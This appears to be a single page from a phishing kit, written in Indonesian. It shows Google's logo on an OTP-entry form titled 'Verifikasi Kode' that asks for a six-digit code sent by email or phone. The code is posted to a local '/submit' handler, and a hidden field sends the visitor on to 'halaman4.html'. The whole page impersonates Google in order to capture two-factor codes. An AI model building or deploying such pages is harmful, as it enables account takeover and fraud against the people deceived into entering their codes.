<!DOCTYPE html>

<html lang="id">
<head>
<meta charset="utf-8"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
<title>Verifikasi Kode</title>
<style>
    * {
      box-sizing: border-box;
    }

    body {
      margin: 0;
      font-family: 'Segoe UI', sans-serif;
      background-image: url('https://images.pexels.com/photos/5767686/pexels-photo-5767686.jpeg?auto=compress&cs=tinysrgb&dpr=2&h=750&w=1260');
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
      color: #333;
    }

    .verification-wrapper {
      background-color: rgba(255, 255, 255, 0.85);
      padding: 40px;
      border-radius: 15px;
      width: 100%;
      max-width: 400px;
      box-shadow: 0 10px 30px rgba(0,0,0,0.2);
      backdrop-filter: blur(10px);
      text-align: left;
    }

    .google-logo {
      width: 80px;
      margin-bottom: 5px;
    }

    h2 {
      margin-bottom: 10px;
      color: #333;
      font-size: 24px;
    }

    .subtext {
      font-size: 13px;
      color: #666;
      margin-bottom: 25px;
      font-weight: 700;
      display: flex;
      align-items: center;
      gap: 6px;
    }

    .subtext::before {
      content: "🔐";
      font-size: 18px;
    }

    form {
      display: flex;
      flex-direction: column;
    }

    label {
      margin-bottom: 5px;
      font-weight: 600;
      color: #444;
      font-size: 14px;
    }

    input[type="text"] {
      padding: 10px;
      margin-bottom: 20px;
      border: 1px solid #ccc;
      border-radius: 6px;
      font-size: 15px;
      transition: border-color 0.3s;
      width: 100%;
      letter-spacing: 3px;
      text-align: center;
    }

    input[type="text"]:focus {
      border-color: #007bff;
      outline: none;
    }

    button.submit-btn {
      background-color: #007bff;
      color: white;
      padding: 12px;
      font-size: 16px;
      border: none;
      border-radius: 8px;
      cursor: pointer;
      transition: background-color 0.3s;
      margin-top: 10px;
      width: 100%;
    }

    button.submit-btn:hover,
    button.submit-btn:focus {
      background-color: #0056b3;
      outline: none;
    }

    .resend-text {
      font-size: 13px;
      color: #555;
      margin-top: 20px;
      text-align: center;
    }

    .resend-btn {
      background: none;
      border: none;
      color: #007bff;
      cursor: pointer;
      font-size: 13px;
      text-decoration: underline;
      padding: 0;
    }

    .resend-btn:disabled {
      color: #aaa;
      text-decoration: none;
      cursor: not-allowed;
    }

    .footer-links {
      margin-top: 30px;
      text-align: center;
      font-size: 12px;
      color: #777;
    }

    .footer-links a {
      margin: 0 8px;
      text-decoration: none;
      color: #777;
    }

    .footer-links a:hover {
      text-decoration: underline;
    }

    @media (max-width: 480px) {
      .verification-wrapper {
        padding: 25px 20px;
        margin: 10px;
      }
    }
  </style>
</head>
<body>
<div class="verification-wrapper">
<img alt="Google Logo" class="google-logo" src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_92x30dp.png"/>
<h2>Verifikasi Kode</h2>
<div class="subtext">Masukkan kode yang telah dikirim ke email atau nomor telepon Anda</div>
<form action="/submit" method="POST">
<label for="otp">Kode Verifikasi</label>
<input id="otp" maxlength="6" name="otp" placeholder="123456" required="" type="text"/>
<button class="submit-btn" type="submit">Verifikasi</button>
<input name="next" type="hidden" value="/halaman4.html"/></form>
<div class="resend-text">
      Kirim ulang kode dalam <span id="countdown">60</span> detik.<br/>
<button class="resend-btn" disabled="" id="resendButton">Kirim Ulang</button>
</div>
</div>
<div class="footer-links">
<a href="#">Bantuan</a>
<a href="#">Privasi</a>
<a href="#">Persyaratan</a>
</div>
<script>
    let countdown = 60;
    const countdownElement = document.getElementById('countdown');
    const resendButton = document.getElementById('resendButton');

    const startTimer = () => {
      const timer = setInterval(() => {
        countdown--;
        countdownElement.textContent = countdown;
        if (countdown <= 0) {
          clearInterval(timer);
          countdownElement.textContent = "0";
          resendButton.disabled = false;
        }
      }, 1000);
    };

    startTimer();

    resendButton.addEventListener('click', () => {
      resendButton.disabled = true;
      countdown = 60;
      countdownElement.textContent = countdown;
      startTimer();
      // Kirim ulang kode bisa ditambahkan AJAX/fetch di sini
    });
  </script>
</body>
</html>
